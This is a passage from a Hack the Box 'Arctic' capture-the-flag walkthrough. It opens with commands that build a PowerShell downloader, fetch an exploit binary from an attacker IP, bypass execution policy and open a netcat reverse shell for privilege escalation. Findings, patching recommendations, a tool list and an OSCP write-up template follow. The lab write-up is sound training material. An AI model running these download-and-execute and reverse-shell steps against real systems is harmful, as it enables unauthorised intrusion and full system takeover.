echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = “http://10.10.14.xx/Chimichurri.exe” >>wget.ps1
echo $file = “Chimichurri.exe” >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

To execute this, standup another SimpleHTTPServer on port 80 (pythom -m SimpleHTTPServer 80) then we enter:

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1

Voila!

Next, we setup another netcat listener on Port 443. nc -nlvp 443 then execute Chimichurri.exe 10.10.14.xx 443

Bazinga! Now, lets move to the Administrator’s Desktop for the Flag!

Whew, we’re done.

Findings, Sample Code, and Flags

Finding 1: The ColdFusion8 server is out of date and allowed the adversary to perform directory traversal to obtain the admin password to CF8.

Finding 2: Upon logging in, the adversary was able to upload a Java reverse shell to the adversary’s system allowing them low-level access. Upon taking the contents of systeminfo to the adversary’s system, they were able to identify several vulnerabilities due to the unpatched system.

Finding 3: After gaining access to the system, the adversary was able to use Powershell to move a compiled executable to the victim system and escalate privileges.

Finding 4: The privilege escalation was successful and the adversary gained the root.txt flag. From here, the adversary had full system access and could have installed Command and Control Infrastructure or used the system for other nefarious purposes such as Business Email Compromise, Cryptomining, or Phishing.

Additional Actions

None.

High-Level Summary and Recommendations

C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Arctic (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using out of date software (its predecessor was released in 2009), the adversary was able to enter a malformed web address (URL) to gain the admin password.

From here, the adversary was able to log in and set up a scheduled task that allowed the adversary to gain a connection outside of ColdFusion to the system which allowed the adversary to determine that this system (which is also beyond End of Life (EOL)) had never been patched and find existing code on the internet to get Administrative permissions and effectively take the system completely over.

The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems. Furthermore, it is recommended that all software, particularly public-facing web servers use the latest stable release of available software.

Specific upgrades recommended are Microsoft Windows Server 2016 or 2019 and ColdFusion 2018 (which may require the web application to be rebuilt).

Tools Used

nmap
dirb
msfvenom
SearchSploit
Crackstation.net
MS10–059: Chimichurri
netcat
Python SimpleHTTPServer
Windows Exploit Suggester

Other Walktroughs:

Blue
Lame
Legacy
Mirai

As many of you know, I am actively working on my Offensive Security Certified Professional (OSCP) and have unsuccessfully attempted the exam once. In concert with a few friends in dc865, I am working through several Hack the Box systems to get more comfortable with the process and better prepared for OSCP.

I am going to do more thorough write-ups on each box I do and publishing them a) immediately if they are retired; or b) as soon as they are retired. This will help others understand the process to pwn a system while helping me stay sharp with the verbosity level required to pass the exam. This could also serve as a roadmap as to how to write up a system for professional work in addition to hobbies and certification. I plan on writing systems up with the following sections (for both user and root; those marked with an asterisk [*] are not required for OSCP reporting - also note that this is out of order for OSCP):

Port Scan Results*

Here, I will share what I was able to find through my port scanning. I will also share the specific scan commands, switches, and syntax that I used. I will use this as a segue to talk about the enumeration phase, which is the next section.

Further Enumeration*

This is where I will talk about my initial enumeration beyond port scanning. This could include OSINT, web page crawling, and other tools. This is the section that most highly-successful penetration testers and red-teamers have told me to focus the majority of my time.

Methodology

Here, I will explain how I got to the point of gaining access and the flags. I will also discuss any red herrings and pitfalls that I encountered as well as my thought processes going in. The flags and code will be in the next section.

Findings, Sample Code, and Flags

This is where I will discuss the actual pwnage. I will share any code that I wrote or modified and how I got the flags. I will not share the actual flags, go find them yourself -Try Harder!

Additional Actions

I reserve this for any additional information. In an actual report, this would be a good section to talk about pivoting in. If anything of importance doesn’t fit another category, put it here.

High-Level Summary and Recommendations

This is where I will discuss the system, what is wrong, and what management should do (but in business terms). It is just as (if not more) important to be able to explain to someone in a non-technical role how you accomplished something and why the current settings are a problem. While we do typically write for a technical audience, we have to remember that they have non-technical people that they answer to.

Tools Used

Here, I will discuss which tools I used and for what.

For this, I used Medium :-)

See you soon, after I pop some shells!

Walkthroughs:

Arctic
Blue
Lame
Legacy
Mirai